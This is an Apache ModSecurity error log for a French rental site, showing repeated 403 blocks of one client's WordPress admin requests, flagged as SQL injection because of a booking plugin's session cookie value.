[Mon May 11 22:27:13.126914 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7oXo_DFxNSZVmaX3QigAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:13.127225 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7oXo_DFxNSZVmaX3QigAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:13.710218 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7oXo_DFxNSZVmaX3QigAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:14.645051 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7ono_DFxNSZVmaX3QjAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:14.645346 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7ono_DFxNSZVmaX3QjAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:15.202101 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7ono_DFxNSZVmaX3QjAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:16.052815 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7pHo_DFxNSZVmaX3QjgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:16.053131 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7pHo_DFxNSZVmaX3QjgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:16.414201 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7pHo_DFxNSZVmaX3QjgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:17.058093 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7pXo_DFxNSZVmaX3QkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:17.058391 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7pXo_DFxNSZVmaX3QkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:17.691682 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7pXo_DFxNSZVmaX3QkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:19.159769 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7p3o_DFxNSZVmaX3QlQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:19.160131 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7p3o_DFxNSZVmaX3QlQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:19.754229 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7p3o_DFxNSZVmaX3QlQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:21.044679 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7qXo_DFxNSZVmaX3QngAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:21.044958 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7qXo_DFxNSZVmaX3QngAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:21.678335 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7qXo_DFxNSZVmaX3QngAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:22.456010 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7qno_DFxNSZVmaX3QpAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:22.456299 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7qno_DFxNSZVmaX3QpAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:23.008055 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7qno_DFxNSZVmaX3QpAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:25.060116 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7rXo_DFxNSZVmaX3QrgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:25.060399 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7rXo_DFxNSZVmaX3QrgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:25.647978 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7rXo_DFxNSZVmaX3QrgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:26.039189 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7rno_DFxNSZVmaX3QtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:26.039621 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7rno_DFxNSZVmaX3QtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:26.447408 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7rno_DFxNSZVmaX3QtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:28.422204 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7sHo_DFxNSZVmaX3QxQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:28.422489 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7sHo_DFxNSZVmaX3QxQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:29.050453 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7sHo_DFxNSZVmaX3QxQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:30.637617 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7sno_DFxNSZVmaX3QzwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:30.637898 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7sno_DFxNSZVmaX3QzwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:31.263621 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7sno_DFxNSZVmaX3QzwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:31.840033 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7s3o_DFxNSZVmaX3Q1gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:31.840334 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7s3o_DFxNSZVmaX3Q1gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:32.549546 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7s3o_DFxNSZVmaX3Q1gAAAMg"], referer: https://rentparadise.fr/wp-login.php
